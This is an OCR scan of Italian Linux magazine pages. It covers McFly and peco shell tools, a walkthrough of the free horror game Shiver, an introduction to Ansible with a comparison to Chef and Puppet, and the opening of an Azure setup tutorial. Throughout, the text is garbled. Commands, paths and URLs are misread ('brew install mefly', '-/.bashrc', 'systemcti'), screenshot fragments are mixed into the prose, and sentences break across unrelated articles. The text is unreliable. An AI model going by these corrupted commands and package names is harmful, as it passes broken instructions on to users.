(qualora non venisse scaricata 

una versione bottles) e relativa 
installazione: per applicazioni che 
necessitano di svariate dipendenze 
il processo completo può richiedere 
anche decine di minuti. AI momento 
di scrivere il numero di software 
disponibili è all'incirca 5.000. Ogni 
giorno il numero aumenta e chi si 
cimenta con il linguaggio Ruby può 
contribuire imparando la terminologia 
Homebrew seguendo le linee guida 
per la costruzione di una formula 
(http://bit.ly/formulacookbook). 


RICERCHE 
VELOCI CON MCFLY 


[i Quando impartiamo un 

\ ) comando nella shell viene 
memorizzato nel file .bash_history 
presente nella home utente. Si può 
utilizzare un file di nome diverso 
specificandolo nella variabile 
d'ambiente HISTFILE. Sullo storico 
dei comandi intervengono altre due 
variabili d'ambiente: HISTSIZE e 
HISTFILESIZE rispettivamente per 
modificare il numero di comandi da 
mantenere nello storico (di default 500 
o 1000) e il massimo numero di righe 
che .bash_history potrà contenere. 
La ricerca di un comando può 
avvenire in almeno 3 modi: con i tasti 
freccia Su e Giù per navigare la 
cronologia, utilizzare il comando 
history (man history) per visualizzare 
l’intero contenuto facendo uso della 
hystory expansion (carattere “!”). Ad 
esempio !Inumero seguito da Invio 
eseguirà il comando avente quel dato 
numero nello storico. Con !-numero 
verrà lanciato il comando precedente 
di posizioni pari a numero a partire 
dall’ultimo. Terza modalità è la reverse 
search con la combinazione Ctrl-r 
che farà apparire il prompt (reverse-i- 
search)”. Iniziando a digitare le prime 
lettere del comando che si vuole 
lanciare la shell effettuerà una ricerca 
all'indietro dal più recente, e 
presenterà di volta in volta il risultato 


corrispondente ad ogni nuova lettera 
aggiunta. Per metodi più veloci, i 
curiosi possono provare McFly (htip:// 
bit.ly/cantinomcfly). Scritto in Rust 
(linguaggio di programmazione 
sviluppato da Mozilla Research, 
http://bit.Iy/langrusd, una volta installato 
viene richiamato dalla combinazione 
Cirl-r sostituendo il reverse search. 
Curiosando tra i repository delle varie 
distribuzioni abbiamo notato che - al 
momento di scrivere - solo ArchLinux 
(https:/www.archlinux.org) lo presenta. 
Possiamo però utilizzare Linuxbrew 
poiché lo sviluppatore ha previsto una 
Formula. Iniziamo ad impostare il 
repositorio per McFly con brew tap 
cantino/mcefly https://github.com/ 
cantino/mefly quindi procediamo 
all’installazione con brew install mefly 
al termine della quale ci verrà ricordato 
di “collegare” McFly alla shell 
aggiungendo al file -/.bashre le righe: 


if [ -r $(brew --prefix)/opt/ 
mcfly/mcfly.bash ]; then 

. $(brew --prefix)/opt/mcfly/ 
mcfly.bash 
fi 


Per applicare subito la modifica 
basta impartire source -/.bashrc. 
AI primo lancio della shell, prima 
del prompt, apparirà un messaggio 
di importazione dello storico dei 
comandi (creazione di un database, 
file history.db, salvato in /home/ 
nome_utente/.mcfly). Al termine 
la combinazione Ctrl-r richiamerà 
McFly: in Figura 2 un esempio 

di ricerca per il comando brew. 
Utilizzando i tasti freccia Su e Giù 
ci si muove nella lista dei comandi 
presentati e per lanciare quello 
selezionato si preme Invio. 


OPERAZIONI DI FILTRO 
IN TEMPO REALE 


fi he La shell mette a disposizione 
ee) Strumenti che permettono di 
filtrare dati provenienti dallo standard 
input e il cui risultato lo ritroviamo sullo 
standard output. Tra i comandi 
ricordiamo sed stream editor di flussi 
di testo, grep per la ricerca di una 
stringa all’interno di uno o più file, 


MEF RESO = 


bar [sl Run PE TAN Edit | 2 Delete, 


B Fig. 2 * McFly aggiungerà alla shell una barra 


di menù con associate funzioni 


head e tail permettono di selezionare 
e scrivere sullo standard output 
rispettivamente l’inizio e la fine di un 
file o lista di file, sort ordina il 
contenuto di un file e così via. 
Caratteristica di questi comandi è 
l'essere non interattivi ovvero non è 
possibile interagire con essi durante 
l’uso e questo non sempre porta al 
risultato che abbiamo pensato. Per 
tale motivo vogliamo segnalare peco 
un sistema di filtro interattivo in tempo 
reale scritto in Go (http://bit.ly/lang-90). 
Può essere visto come un ottimo 
strumento per analizzare file di log, 
trovare file su disco, eccetera, perché 
ha la caratteristica di fornire i risultati in 
tempo reale ogni volta che digitiamo 
una lettera. Utilizzando Homebrew lo 
installiamo con brew install peco. 
L'uso è semplice, è sufficiente 
metterlo in pipe con il comando che si 
vuole utilizzare. In Figura 3 la verifica 
dei servizi attivi in systemd utilizzando 
systemcti list-unit-files | peco, ma è 
possibile associarlo — sempre in pipe 
— a quelli elencati in precedenza così 
come a ps, find, history ovvero a 
comandi che forniscono un output da 
cui selezionare dati e/o gruppi di file/ 
righe. Supporta diversi filtri come 
IgnoreCase (default), SmartCase e 
RegExp che permette di utilizzare le 
espressioni regolari. L’output della 
ricerca possiamo “portarcelo dietro” 
sull’output della shell premendo Invio. 
Per l’approfondimento rimandiamo al 
link http://bit.ly/pecogithub, che offre gif 
animate sull’uso di peco. 


Bi Fig.3° 
Esempio di 
peco in pipe 
con systemctl 


pese 
dl 
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Un'avventura horror 
da provare! 


E intenti alla guida della nostra auto per ritornare a casa ma 
un incidente imprevisto cambierà totalmente i nostri piani! 


Licenza: Free 
Sito Web: http://bit.ly/shivergame 
Tipo: Gioco 


i giochi di avventura ne abbiamo 
recensiti diversi in questa rubri- 
ca, l’ultimo in ordine di tempo è 
Encodya (numero 193, mese di coperti- 
na Ottobre/Novembre 2019) per il quale, 
tra qualche mese (primo trimestre 2020), 
è previsto il lancio sulla piattaforma Ste- 
am. Ma rimaniamo ai giorni nostri, anzi: 
torniamo indietro di 2 anni, e di preciso 


Fig. 1 Il menù spartano di Shiver 
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nel 2017, quando la piccola etichetta 
indipendente Kowai Sugoi Studios rila- 
scia la prima versione giocabile di Shi- 
ver, un’avventura horror del tipo “punta 
e clicca” nella quale per procedere oc- 
corre risolvere degli enigmi. Solo qualche 
settimana fa — Settembre 2019 - è stato 
annunciato il suo rilascio Free, pertanto 
chi vuole può provarlo nelle modalità che 
riporteremo nel seguito. 


COME SI INSTALLA? 


Nel volgere di 2 anni Shiver ha avuto il 
supporto della piattaforma videoludica 
Steam (http://bit.Iy/steampow pertanto 
chi ha già l'omonimo client nella 


propria distribuzione. può procedere 
all’installazione del gioco secondo le 
modalità oramai notema cheriportiamo di 
seguito — a grandi linee — per comodità dei 
nuovi utenti. Come primo passo occorre 
crearsi un account sulla piattaforma 
Steam, quindi procedere all’installazione 
del client utilizzando il gestore dei 
pacchetti della distribuzione in uso. Va 
ricordato che nelle distribuzioni GNU/ 
Linux non viene installato direttamente il 
client bensì l’installer Steam che al primo 
lancio, in automatico, scarica l’ultima 
versione del client provvedendo poi alla 
sua installazione. Solo a questo punto 
è possibile lanciare il client e, una volta 
effettuato il login, è sufficiente cliccare 
sul menù Store e scrivere nella casella 
di ricerca Shiver optando per la versione 
Free to Play. Nella nuova pagina è 
sufficiente cliccare sul pulsante verde 
Play Game per iniziare il download con 
successiva installazione al termine della 
quale sarà possibile lanciare il titolo. In 
generale, però, l’installazione del gioco 
— almeno fino. al momento di scrivere 
— è anche indipendente da Steam nel 
senso che è possibile provarlo senza 
avere il. client.della Valve Corporation 
installato. A ciascuno la decisione sul 
tipo di installazione da adottare, poiché 
per la. seconda modalità è sufficiente 
puntare il proprio. browser all'indirizzo 
http://bit.Iy/aquilusshiver quindi cliccare 
sul pulsante rosso Download recante 
licona del pinguino per poter scaricare 
il file Shiver Linux.zip (circa 190MB) il 
quale, una volta salvato in una cartella 
nella. propria home utente, dovrà 
essere decompresso. Eseguita questa 
operazione verrà creata. la cartella 


Shiver Linux: entriamo in essa e diamo 
i permessi di esecuzione al file Shiver. 
x86_64 (o analogo a 32 bit Shiver.x86, in 
funzione dell’architettura del proprio PC) 
utilizzando chmod +x Shiver.x86_64. A 
questo punto cliccando sull’eseguibile 
è possibile lanciare il gioco il quale, 
dopo qualche secondo di caricamento, 
mostrerà il menù (Figura 1). Ai maniaci 
della “pulizia del filesystem”, facciamo 
presente che il motore di gioco creerà 
una cartella di nome /unity3d/Kowai 
Sugoi Studios nel percorso /home/ 
nome_utente/.config. 


DUE PAROLE SUL GIOCO 


Nei tutorial riportiamo i primi passi da 
seguire per iniziare il gioco ed entra- 
re nella sua ottica del “punta a clicca”. 


REQUISITI HARDWARE 


Anche il client deve fare la sua parte 

su hard disk, almeno 26B di RAM, un 
processore [AMD o Intel) e una sche- 
da video (AMD/ATI o nVidia) vecchi di 
qualche anno andranno più che bene. Il 
primo lancio suggeriamo di effettuarlo 
da un terminale affinché sia possibile 
risolvere eventuali warning, anche se 
non pregiudicano il funzionamento del 
gioco. Ad esempio se ci viene restitu- 
ito il messaggio Failed to load module 
"canberra-gtk-module" l'installazione 
del pacchetto libé4canberra-gtk0 non | 
lo farà più apparire. | 


Chi ha sviluppato il titolo non ha forza- 
to la mano sulla grafica che è sempre 


- godibile ma non si può definire eccelsa. 
Di fatto è ben al di sotto delle potenzia- 
lità dell'engine grafico Unity (/M0:/0/£ 
ly/unitygamederì i quale - lo ricordiamo 
- permette di realizzare titoli con gra- 
fica mozzafiato supportando ben oltre 
20 piattaforme, compreso GNU/Linux. 
Premesso questo le risorse richieste 
sono piuttosto basse. Nessuna con- 
nessione a Internet, poiché è un single 
player stand-alone, circa 1GB di spazio. 


Il gameplay non è per nulla complicato 
risultando, anzi, molto intuitivo. Tutto 
sta nell’utilizzare gli oggetti che si tro- 
vano e abbinarli correttamente al fine di 
compiere una data azione. Ad esempio 
avendo (passo 3 del primo tutorial) un 
accendino e un pacchetto di sigarette 
è sufficiente prendere l’accendino clic- 
cando su di esso con il tasto sinistro del 


mouse, portarlo sul pacchetto di siga- 
rette e rilasciarlo sempre cliccando con 
il tasto sinistro per portare a termine il 
gesto di accendersi una sigaretta. Anche 
la dinamica contraria — ovvero portare 
l'accendino sul pacchetto di sigarette 
- porterà l’azione dell’accendersi la si- 
garetta a corretto compimento. Questa 
dinamica è valida per tutto il gioco e una 


volta presi i diversi oggetti che si presen- 
teranno l'abbinamento seguirà una sua 
logica. Logica che è connessa anche ai 
messaggi che appaiono in basso ogni 
volta che - curiosando nei vari ambienti 
- si fa click con il tasto sinistro del mouse 
allorquando il puntatore assume le sem- 
bianze di un occhio stilizzato. 

È importante leggere attentamente i 


Inizia l'avventura 
Poco da configurare e si parte subito 1 
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» IL VIAGGIO 

03 | Il gioco inizia alla guida di 

° un'auto di notte sotto una ne- 

vicata con lo scorrere di alcune scritte in 
basso al termine delle quali si attiverà il 
puntatore del mouse [una mano stilizzata]. 
Si inizi con il pacchetto di sigarette sul cru- 
scotto, portandovi sopra il puntatore del 
mouse: quando appare la scritta Cigarette 
Package basta un click per prenderlo. 


LA GRAFICA 
02 Nel sotto-menù Options del 
menù generale si trovano 3 
parametri: Language per impostare la 
lingua,di gioco lil titolo non è localizza- 
to in Italiano e sono presenti solo Cine- 
se, Francese e Inglese] e la parte audio 
con SFX volume per gli effetti durante 
il gioco e Music volume per la colonna 
sonora di sottofondo. 


RISOLUZIONE 
0 1 Ad ogni lancio, prima del menù 
generale [Figura 1), apparirà 
una finestra coni tab Graphics e Input. 
Nella sezione Input si possono scegliere 
le impostazioni di default mentre nel tab 
Graphics si deciderà se visualizzare il 
gioco a tutto schermo {bisogna deselezio- 
nare la casella Windowed], la risoluzione 
dello schermo e la qualità grafica. 


Re 


INCIDENTE 

Gli oggetti presi - con possibili impieghi - vengono 
posti nella sezione dell'inventario che si può visio- 
nare portando il puntatore del mouse sul bordo superiore 
facendo apparire un'area color marrone. Si punti ora il por- 
taoggetti sulla destra dell'auto e, quando appare la scritta 
Glove Box, basta un click con il tasto sinistro per prendere la 
cassetta [Cool Tape) e ascoltarla. 


DARSI DA FARE 

A questo punto ha inizio il gioco. Usciti dall'auto la 
prospettiva non è delle migliori. Non si può aspet- 
tare che passi qualcuno perché siamo nell'Oak National 
Park fuori stagione pertanto ci si dovrà arrangiare. Non si ha 
scelta, l'unica è procedere per la strada sulla sinistra, che si 
potrà percorrere spostando il mouse su di essa e cliccando 
quando si vedrà una freccia a sinistra. 


BRACCIO ROTTO 

Dopo pochi secondi un “qualcosa” appare davanti e 
per schivarlo si è costretti ad una manovra brusca che 
farà perdere il controllo dell'auto. Il risveglio ci vedrà capovolti 
{passo precedente): per uscire dall'auto si dovrà rompere il pa- 
rabrezza dell'auto con il masso (Rock). Eseguita l'operazione, 
portando il puntatore del mouse sul parabrezza apparirà una 
freccia: basta un click con il tasto sinistro per uscire dall'auto. 


SOPRAVVIVENZA 

AL primo bivio (figura passo precedente) si potrà 
decidere di salire verso destra per vedere il pun- 
to dell'incidente. Procedendo in avanti si entrerà nel parco e 
si raggiungerà il Centro Visitatori (ovviamente chiuso!). Non 
diamo più suggerimenti, ma si guardi ogni singolo dettaglio: 
la banderuola gialla visibile in figura conterrà qualcosa, e per 
raggiungerla ci occorre un'ascia per tagliare l'albero. 


messaggi poiché sono collegati con 
gli accadimenti che si susseguono nel 
gioco. Ad esempio, dopo l’incidente 
spostando il puntatore su diversi punti 
dell’auto ci verrà ricordato che vi sono 
ancora alcuni litri di carburante, che ci 
ritorneranno utili in seguito per avviare 
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un generatore di emergenza. Ma per 
compiere questa azione necessiteremo 
di un tubo e una tanica (anche una bot- 
tiglia vuota va più che bene). Nell’insie- 
me il titolo ha il suo grado di suspence 
e permette di passare un po’ di tempo 
di relax, unico neo è che in meno di 2 


ore è possibile portarlo a termine. Non 
si disdegnano ulteriori livelli a difficoltà 
progressive. 

Speriamo che in futuro venga effettuato 
un corposo aggiornamento rendendo il 
gioco più lungo, impegnativo e diver- 
tente. 


CODICE DI 
ESEMPIO SUL 

- SITO WEB: 

http:/bît.Iy/androidsolidtfe 


a gestione della dotazione software e 

della configurazione dei servizi sono es- 
senzialmente le due attività che tengono 
occupati i system administrator durante l’arco 
della loro giornata lavorativa. Ci si trova quo- 
tidianamente davanti all’esigenza di installare, 
rimuovere, aggiornare e configurare pacchetti 
software nei server Linux (fisici o virtuali: che 
siano). Ormai da diversi anni ci stiamo sempre 
più allontanando dai classici script shell in bash, 
che ogni sistemista pazientemente si costruiva 
nel tempo, passando a sistemi più standard di 
Configuration Management, ovvero ai software 
che ci permettono di automatizzare la gestione 
dei sistemi adoperando linguaggi più o meno 
complessi; per far fronte a questa esigenza il 
mondo Open Source ha creato diversi strumenti 
per facilitare la gestione della configurazione; 
parliamo di progetti ormai molto noti come: 
Ansible, Puppet (https:/puppet.com/), Chef 
(https://www.chef.io/) e non ultimi SaltStack 
(htips://www.saltstack.com) e Terraform 
(https://www.terraform.io/). Ansible è un pro- 
getto relativamente giovane, creato nel 2012, 
grazie ai suoi punti di forza ha acquisito rapi- 
damente una folta schiera di utilizzatori tanto da 
attirare l’attenzione di Red Hat che alla fine del 
2015 ha deciso di acquisire Ansible Inc. al fine 
di commercializzare la sua versione di Ansible 
(Red Hat Ansible Engine). In linea di massima 
questi software, che abbiamo velocemente elen- 
cato, si somigliano molto nelle loro funzionalità 
generali e sono tutti molto efficienti; normal- 
mente il loro modus operandi è quasi comune 


LE" 


ANSII 


IL CONFIGURATION 


MANAGER 


MULTIPIATTAFORMA 


Gestire poche installazioni di Linux è semplice 

e veloce, ma cosa accade quando lavoriamo con grandi 
numeri? Configurare gruppi di server, specie 

se eterogenei, diventa oneroso... per questo c'è Ansible 


a tutti. Si distinguono essenzialmente due tipi di 
server, o ruoli, più specificatamente: i nodi e le 
macchine manager (o controllori). La macchina 
manager, cioè quella principale, è quella che or- 
chestra il tutto eseguendo determinati comandi 
sui nodi target effettuando una connessione ad 
essi e mostrando l’esito delle operazioni pro- 
grammate. Il vantaggio innegabile di questi si- 
stemi è che, oltre a richiedere praticamente lo 
stesso effort per la modifica su un host oppure 
su mille, permettono facilmente di utilizzare il 
codice proveniente da un sistema di versioning; 
permettendo così di controllare dettagliatamen- 
te le modifiche ma anche di offrire tutto lo stori- 
co evolutivo dell’infrastruttura stessa. 


Inventory 


Playbooks 
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ANSIBLE DA VICINO 


Rispetto a tutti gli altri strumenti della mede- 
sima tipologia, Ansible risulta essere molto 
minimale in materia di requisiti richiesti per 
la sua esecuzione; in effetti, gli unici elementi 
usati da Ansible sono solitamente già installati 
(di default) in tutte le distribuzioni Linux at- 
tuali (Python 2.5, o superiore, ed OpenSSH). 
Ansible non usa un agent dedicato per col- 
legarsi ai suoi nodi, è infatti uno strumento 
agent-less, effettua delle semplici connessioni 
SSH per gli ambienti Linux/Unix ed usa Po- 
werShell/WINRM su Windows, ne consegue 
quindi che la sua implementazione, a livello 
infrastrutturale, è decisamente più. immediata 


Bi Fig. 1 Ecco lo schema architetturale di Ansible, la creatura di Michael 
DeHaan già autore di Cobbler e co-autore di Func 
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Muovere i primi passi con Ansible 


Ansible usa una semplice connessione SSH e dei files di testo per lavorare con i vostri server 


GNU nano 2.7.4 File: /etc/apt/sources.list 


kports n 


le/ubuntu trusty main 


Per installare una versione recente di Ansible in 

Debian 9.11 installiamo i pacchetti .deb presenti 
nei repository di Ubuntu. Editiamo il file /etc/apt/sources.list 
ed aggiungiamo alla fine deb Attp://ppa.launchpad.net/ansi- 
ble/ansible/ubuntu trusty main. 


tmpfs 150 {run 


tmpfs frun/tock 


tmpis 


Ansible offre i cosiddetti ad-hoc commands; cioè 

quei comandi eseguibili liberamente senza che sia 
necessario salvarli. Questi comandi ad-hoc possono essere 
lanciati al bisogno, quindi senza doverli collocare per forza 
in un playbook. Vediamone un paio di seguito in figura. 


Il procedimento non è lungo, ecco i comandi: 
$ sudo apt-key adv --keyserver keyserver. 
ubuntu.com --recv-keys 93C4A3FD7BB9C367 


$ sudo apt update && apt install ansible 


dopo le conferme Ansible è installato. 


v nginx. yml 


nfig file 
REXAARKARRARARARARA TARRA RRARRA RARA 


RARARRRAARAAEEEARARAARARKARAREARTRARRRER 


VRARRRAARRRATAAEEIAEATAR 


server ] 
, u'htop']) = l{"ansibi 


“htop"]} 


ie [u"'nginx 


false, "item" 


anged' 


["nginx", 


KAKAKRETTKRAAAAAREARRARERA RAFFTEREEEE RAR 


Per creare un playbook occorre aprire il nostro editor 

preferito e creare il file nginx.yml. L'installazione dei 
pacchetti viene specificata dal comando with_items, che esegue 
l'elenco corrispondente sul nodo desiderato root. Per eseguirlo 
lanciamo il comando seguente: ansible-playbook -v nginx.yml. 


visto che non bisogna modificare i firewall o 
fare modifiche al routing. Quando ci approc- 
ciamo ad un nuovo strumento per capire bene 
il suo funzionamento è necessario conoscerne 
innanzitutto i termini essenziali, così da com- 
prenderne meglio le sue componenti principali 
e l’intero funzionamento; ecco quelli più co- 
muni che incontreremo in Ansible: 


e Inventory - Si tratta di un vero e proprio 
file di censimento che definisce la nostra 
rete; è la lista dei server target con i quali 


Ansible può interagire. Per comodità, tutti i 
server possono essere raggruppati in modo 
da avere più insiemi di host correlati tra loro 
(ad es. potremmo dividere i tre ambienti 
Sviluppo/Test/Produzione). L’inventory di 
solito è scritto in formato ini ma Ansible 
lo accetta anche in formato YAML (https:// 
it.wikipedia.org/wiki/YAML). Il suo path 
di default può essere cambiato avendo però 
cura di indicarlo ad Ansible. 

Moduli - I moduli si possono considerare 
come i comandi che eseguiamo sui server 


target. Esistono svariati moduli; moduli per 
l’installazione e la rimozione di pacchetti 
.deb o .rpm, per la creazione di files e di di- 
rectory, per la gestione dei servizi e molto 
altro. 

e Task-Itask sono le operazioni che, di fatto, 
eseguiamo sui server. Possono essere visti 
come una serie di comandi, in sequenza, 
che verranno lanciati sui server indicati. Un 
task è in sostanza l’uso di una, o più funzio- 
nalità, di un modulo con particolari opzioni. 

e Handler - Gli handler sono specifiche 


sasorebema 


e_date time": { 


E! Fig. 2 è Per recuperare informazioni utili dal target si utilizza un apposito 
modulo setup (-m setup) che esegue un retrieve delle informazioni 


azioni eseguite da Ansible. Le operazioni 
associate agli handler si differenziano dai 
semplici task poiché non vengono sempre 
eseguite bensì vengono richiamate come 
conseguenza di un evento innescato da un 
task. Un banale esempio può essere quello 
di avviare un servizio dopo aver installato 
il pacchetto software, oppure riavviare un 
demone dopo la modifica del suo file di 
configurazione. 

Playbook - I playbook, scritti in formato 
YAML, sono una lista di task e di handler 
(incluse le relative variabili), legati a par- 
ticolari gruppi di server presenti nell’in- 
ventory. Vengono utilizzati per creare una 
guida volta ad istruire Ansible riguardo 
tutte le operazioni che dovrà eseguire sui 
server target. Il linguaggio YAML non in- 
tende essere un vero e proprio linguaggio 
di programmazione ma piuttosto uno stru- 
mento per la modellazione delle istruzioni 
contenute nei playbook. Esistono diverse 
funzionalità essenziali associate ai play- 
book, quali templates, loops, conditionals, 
tags e blocks. 

Templates - I Template sono file che ven- 
gono costruiti dinamicamente, sulla base di 
variabili, durante l'esecuzione di un play- 
book. Ad esempio, se volessimo installare 
diverse versioni di PHP, su un server web, 
invece di creare tanti playbook quante sono 
le versioni desiderate basterà crearne uno 
solo come template, contenente come va- 


riabile la versione da installare ed ogni vol- 
ta che si deve eseguire, gli si passa (come 
variabile) la versione di PHP da installare. I 
template, quindi, sono modelli di playbook 
che consentono, dinamicamente, di settare/ 
modificare variabili e generare file di confi- 
gurazione, partendo da variabili. La costru- 
zione dei template è possibile grazie ad un 
motore chiamato Jinja2 (https://docs.ansi- 
ble.com/ansible/latest/user_guide/playboo- 
ks_templating.html) integrato in Ansible. 
Ruoli - I ruoli sono delle sezioni dei play- 
book che raggruppano più operazioni lega- 
te tra di loro da un particolare fine. Queste 
parti dei playbook solitamente vengono 
unificate per avere più riusabilità delle stes- 
se. Ad esempio, l’installazione, la configu- 
razione e la gestione del servizio MySQL 
possono essere raggruppate in un unico 
ruolo; questo offre la possibilità di riutiliz- 
zare il medesimo ruolo in playbook diversi. 
Facts - I facts, meglio noti come “discove- 
red facts”, sono porzioni di informazioni 
raccolte dai nodi target che possono essere 
memorizzate come variabili per un succes- 
sivo utilizzo nei playbook. I facts sono utili, 
ad esempio, nel caso in cui vogliamo cono- 
scere particolari attributi dei sistemi opera- 
tivi sui quali stiamo lavorando. Inoltre, la 
raccolta dei facts, può essere disabilita cosa 
che risulta comoda in alcune situazioni, per 
esempio quando i comandi vengono esegui- 
ti su molteplici host target. 


L'IDEMPOTENZA 
DI ANSIBLE 
EDI SUOI MODULI 


L’idempotenza, termine matematico e infor- 
matico noto a molti, è tornato prepotentemente 
nel nostro dizionario IT proprio grazie ad An- 
sible e nello specifico ai suoi moduli. In pra- 
tica, l’idempotenza dei moduli Ansible indica 
la loro caratteristica operativa che assicura di 
avere sempre un sistema target integro ad ogni 
singola esecuzione. I moduli non modificano 
nulla, nella configurazione del server target, 
se non è necessario; l’obiettivo che si prefigge 


Linux Magazine 


Ansible è dunque quello di poter eseguire, ri- 
petutamente, i playbook con l'assoluta certezza 
che tutto continui a funzionare senza ricadute 
nel sistema di destinazione. Tutti i moduli ri- 
chiamati ed eseguiti dallo strumento effettua- 
no, sempre e solo, le operazioni non eseguite in 
una esecuzione precedente. 

Come già detto in precedenza Ansible è uno 
strumento modulare, la lista dei moduli di- 
sponibili (per i diversi sistemi operativi) è ben 
nutrita e copre praticamente tutte le operazio- 
ni, ripetitive e non, che ogni amministratore 
di sistema esegue; ad ogni modo, qualora non 
trovassimo il modulo che fa per noi è possi- 
bile scriverne uno di proprio pugno, oppure 
possiamo sempre dare un’occhiata ai moduli 
extra presenti su GitHub utilizzando la chiave 
di ricerca appropriata (http://bit.ly/2siWeJM). 
Per quanto riguarda invece la creazione ex- 
novo dei moduli, consideriamo che Ansi- 
ble non ci obbliga a scrivere i nostri moduli 
in Python, si può usare qualsiasi linguaggio 
di programmazione a condizione che quello 
scelto sia in grado di trattare il formato JSON. 
Python, tuttavia, resta il linguaggio di riferi- 
mento per l’implementazione di molti moduli 
Ansible esistenti. 


CHEF VS PUPPET 
VS ANSIBLE 


Come abbiamo detto Ansible è inserito nel seg- 
mento dei sistemi di configuration management 
insieme a Chef, Puppet e similari. Si tratta di un 
mercato piuttosto affollato e ricco di competitor 
sia in ambito Open Source sia in quello del sof- 
tware proprietario. In realtà è difficile effettuare 
una comparazione diretta con gli altri rivali per- 
ché Ansible dispone di caratteristiche peculiari 
che lo promuovono come uno strumento unico 
nel suo genere. La sua semplicità di adozione, 

e di utilizzo, spicca nel confronto con prodot- 

ti che sono sul mercato da molto più tempo ed 

hanno una reputazione consolidata. 

Primo aspetto, la facilità di installazione. 

e Chef - Chef ha un’architettura master-agent. 
Il server Chef viene eseguito nel nodo master 
ed il client Chef viene eseguito (come agen- 
te) in ogni server target. Inoltre, c’è un com- 
ponente aggiuntivo chiamato workstation, ed 
è l’oggetto che contiene tutte le configurazio- 
ni che vengono testate e poi inviate al server 


eseguiti come agent in ogni server da con- 
figurare. Successivamente, bisogna gestire 
anche una firma del certificato tra l’agent e 
il master. 


e Ansible - Ansible ha solo un manager in 
esecuzione su un server ma nessun agent in 
esecuzione sui server target. Utilizza esclu- 
sivamente la connessione SSH per accedere 
ai sistemi che si desidera gestire. I server di 
destinazione non richiedono alcuna configu- 
razione particolare, pertanto è il più veloce 
da configurare/installare. 


Secondo aspetto, configurazione dello stru- 
mento. 

Prima di spiegare la differenza tra questi stru- 
menti, sulla base della gestibilità, lasciate che 
vi ricordi che Puppet e Chef eseguono delle 
configurazioni pull, mentre Ansible esegue una 
configurazione push. Vi state chiedendo quali 
sono le differenze tra queste tipologie di con- 
figurazioni? Bene, brevemente, nella modalità 
di tipo push tutte le configurazioni presenti nel 
server centrale vengono inviate ai nodi; mentre, 
nella configurazione pull, i nodi di destinazione 
estraggono automaticamente tutte le informa- 
zioni dal server centrale. 


e Chef - è necessario essere un programmato- 
re per gestire le sue configurazioni, in quan- 
to bisogna conoscere il suo linguaggio Ruby 
DSL. Ogni client estrae le configurazioni dal 
server. 

e Puppet - non è molto amichevole nella ge- 
stione delle configurazioni poiché utilizza 
un proprio linguaggio chiamato Puppet DSL 
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(o Domain Specific Language). Anche qui, 
ogni client estrae le configurazioni dal ser- 
ver centrale. Puppet è spiccatamente orien- 
tato all’amministratore di sistema ed offre 
un’esecuzione remota non proprio immedia- 
ta. 


e Ansible - offre una configurazione facile da 
comprendere e da gestire in quanto utilizza il 
formato YAML (ogni listato somiglia molto 
all’inglese scritto) quasi auto-esplicativo di- 
rei. Il formato YAML ha precise regole: ad 
esempio la tabulazione non è accettata, in fa- 
vore di un’indentazione a due spazi. Il server 
Ansible esegue il push delle configurazioni 
verso tutti i nodi ed offre l'esecuzione remo- 
ta, immediata, dei comandi. 


Terza metrica, la disponibilità. 
Dobbiamo dire che tutti gli strumenti di questa 
tipologia offrono un’elevata disponibilità di ser- 
vizio; il che significa che sono presenti più ser- 
ver (oppure più istanze) che comunque garanti- 
scono, in caso di fail, una continuità operativa. 
e Chef - quando si verifica un errore nel server 
primario, in pratica il server principale, Chef 
dispone di un server di backup pronto per 
prendere il posto del server in errore. 


e Puppet - ha un’architettura multi-master, se 
il master attivo va giù, l’altro master (quello 
secondario) prende automaticamente il posto 
del master attivo. 

e Ansible - viene eseguito con un singolo nodo 
attivo, denominato istanza primaria. Tuttavia, se 
tale istanza non è più funzionante, si può creare 
un'istanza secondaria che prenderà il suo posto. 
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Workingwith dynamic Inventory 
Patterns: targeting hosts and groups 
Introduction to ad-hoc commands 
Connection methods and details 
Working with command line tools 


e_policy_leaf_profile - Manage Fabric interface policy leaf profile 


centrale di Chef. Working With Playbooks 


Understanding privilege escalation: 
become 


ge attachable Access Entity Profile (AEP) objects (infra:AttEntityP. infra: 
aci_aep_to_domain - Bind AEPs to Physical or Virtual Domains (infra:RsDomP) 


e aci ap- Manage top level Application Profile (AP) objects (fv:Ap) 


e Puppet - Puppet ha anch'esso un’architettura 
master-agent. Il server Puppet viene eseguito 
nel server master ed i client Puppet vengono 


Ml Fig. 3 è | moduli sono solitamente autonomi e possono essere scritti con un 
comunissimo linguaggio di script come Python, Perl, Ruby, etc. 
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Per ultima, l’interoperabilità 

Master, agent, etc.: li installiamo su setver Linux 
oppure su server Windows? Diamo un'occhiata ra- 
pida ai requisiti dei tre strumenti. 


e Chef - Chef Server funziona solo su Linux/Unix 
ma il client Chef e Workstation possono essere 
installati pure su Windows. i 

e Puppet - Puppet Master funziona solo su Linux/ 
Unix ma il Puppet Agent funziona anche su ser- 
ver Windows. 


e Ansible - Ansible supporta anche le macchine 
Windows Server ma il server Ansible deve essere 
per forza installato su macchine Linux/Unix. 


CONCLUSIONI 


In quest'articolo abbiamo appena scalfito la 
superficie di Ansible ma ci auguriamo di aver- 
vi dato l’idea di quanto sia potente e facile da 
installare. Utilizzando inventory, playbook e 
ruoli possiamo creare un’intera infrastruttura 
a partire da zero. Ansible può essere installa- 
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sudo pip install ansible[azure] 


GHU nano 2.7.4 File: 


% Innanzitutto, necessitiamo di una sottoscrizione 
? Azure attiva; naturalmente possiamo creare un ac- 
count gratuito. Successivamente installiamo i moduli Azure, 
necessari per Ansible, con il comando: 


home/valerio/_azureconf/credentials 


Tutte de risorse 
Tutte le risorse 


ld fe 
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to ovunque: può trattarsi di una VM locale, di 
una macchina fisica, oppure di un server nella 
nuvola; poco importa il dove a patto che siano 
disponibili una connessione SSH verso di essa 
e le opportune credenziali di accesso. Vale la 
pena dare un’occhiata al comando ssh-copy-id 
per distribuire le chiavi sulle macchine dell’in- 
ventory a cui si dovrà accedere con Ansible. 
Speriamo di avervi incuriosito abbastanza tan- 
to da iniziare ad usare uno strumento di Confi- 
guration Management. 


Azure Active Sottoscrizioni Tutta le risorse Macchine 
Directory virtuali 
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CREAZIONE DI UN SERVI i 
Per configurare l’ambiente è necessario l'ID della 


2 sottoscrizione di Azure ed i valori del servizio che 
useremo per il deploy della VM. Aprite un'istanza CloudShell 
ed inserite il comando: 

az ad sp create-for-rbac --name ServiceLinuxMagazine 


Una volta sens il servizio ssivitin le informa- 
zioni, restituite dall'output della PowerShell, in un 
file di credenziali che verrà poi in seguito usato da Ansible. 
Creiamo una directory col comando mkdir -/.azure e suc- 
cessivamente il file con i dati necessari: 


